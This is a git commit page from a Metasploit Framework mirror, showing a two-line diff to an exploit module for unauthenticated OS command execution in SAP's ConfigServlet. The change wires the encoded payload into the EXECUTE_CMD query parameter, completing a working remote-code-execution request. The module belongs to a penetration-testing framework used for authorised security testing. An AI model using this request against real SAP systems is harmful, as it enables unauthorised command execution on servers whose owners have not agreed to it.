infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

basic payload execution through OS command execution

unstable
Andras Kabai 2013-04-20 13:02:22 +02:00
parent 223556a4e6
commit 7b6a784a84
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
View File

@ -22,6 +22,7 @@ class Metasploit3 < Msf::Exploit
],
'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', {} ]
@ -46,7 +47,7 @@ class Metasploit3 < Msf::Exploit
{
'uri' => uri,
'method' => 'GET',
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' # FIXME payload processing here
'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(payload.encoded)
})
if !res or res.code != 200
print_error("#{rhost}:#{rport} - Exploit failed.")